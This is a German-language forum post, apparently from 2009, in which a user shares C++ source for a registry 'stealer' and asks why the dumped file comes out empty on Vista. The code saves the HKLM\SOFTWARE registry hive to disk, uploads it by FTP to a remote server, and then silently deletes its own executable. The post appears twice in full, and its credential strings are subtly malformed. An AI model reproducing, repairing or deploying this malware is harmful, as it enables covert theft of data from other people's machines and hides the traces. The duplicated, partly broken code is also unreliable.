skullyan
15.04.2009, 23:33
#include <windows.h>
#include <wininet.h>
#include <process.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <conio.h>
using namespace std;
void upload(char *server, char *account, char *passwort);
void save();
BOOL SelfDelete();
int main()
{
save();
char server[50] = {'serveradresse'};
char account[50] = {'username'};
char passwort[50] = {'passwort'};
upload(server, account, passwort);
SelfDelete();
return EXIT_SUCCESS;
}
void upload(char *server, char *account, char *passwort)
{
HINTERNET hOpen, hConnection;
hOpen = InternetOpen("FTP Upload", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnection = InternetConnect(hOpen, server, INTERNET_DEFAULT_FTP_PORT,
account, passwort, INTERNET_SERVICE_FTP, 0, 0);
FtpPutFile(hConnection, "C:\\data.reg", "//data.reg",
FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hConnection);
InternetCloseHandle(hOpen);
}
void save()
{
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\", 0, KEY_ALL_ACCESS, &key);
RegSaveKey(key, "C:\\data.reg", 0);
RegCloseKey(key);
}
BOOL SelfDelete()
{
TCHAR szFile[MAX_PATH], szCmd[MAX_PATH];
if((GetModuleFileName(0,szFile,MAX_PATH)!=0) &&
(GetShortPathName(szFile,szFile,MAX_PATH)!=0))
{
lstrcpy(szCmd,"/c del ");
lstrcat(szCmd,szFile);
lstrcat(szCmd," >> NUL");
if((GetEnvironmentVariable("ComSpec",szFile,MAX_PATH)!=0) &&
((INT)ShellExecute(0,0,szFile,szCmd,0,SW_HIDE)>32))
return TRUE;
}
return FALSE;
}
Der stealer ist so gecodet dass er den reg kopieren und auf nen server schicken soll. die reg hat aber 0kb. habs auf vista probiert. woran liegts?
#include <wininet.h>
#include <process.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <conio.h>
using namespace std;
void upload(char *server, char *account, char *passwort);
void save();
BOOL SelfDelete();
int main()
{
save();
char server[50] = {'serveradresse'};
char account[50] = {'username'};
char passwort[50] = {'passwort'};
upload(server, account, passwort);
SelfDelete();
return EXIT_SUCCESS;
}
void upload(char *server, char *account, char *passwort)
{
HINTERNET hOpen, hConnection;
hOpen = InternetOpen("FTP Upload", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnection = InternetConnect(hOpen, server, INTERNET_DEFAULT_FTP_PORT,
account, passwort, INTERNET_SERVICE_FTP, 0, 0);
FtpPutFile(hConnection, "C:\\data.reg", "//data.reg",
FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hConnection);
InternetCloseHandle(hOpen);
}
void save()
{
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\", 0, KEY_ALL_ACCESS, &key);
RegSaveKey(key, "C:\\data.reg", 0);
RegCloseKey(key);
}
BOOL SelfDelete()
{
TCHAR szFile[MAX_PATH], szCmd[MAX_PATH];
if((GetModuleFileName(0,szFile,MAX_PATH)!=0) &&
(GetShortPathName(szFile,szFile,MAX_PATH)!=0))
{
lstrcpy(szCmd,"/c del ");
lstrcat(szCmd,szFile);
lstrcat(szCmd," >> NUL");
if((GetEnvironmentVariable("ComSpec",szFile,MAX_PATH)!=0) &&
((INT)ShellExecute(0,0,szFile,szCmd,0,SW_HIDE)>32))
return TRUE;
}
return FALSE;
}
Der stealer ist so gecodet dass er den reg kopieren und auf nen server schicken soll. die reg hat aber 0kb. habs auf vista probiert. woran liegts?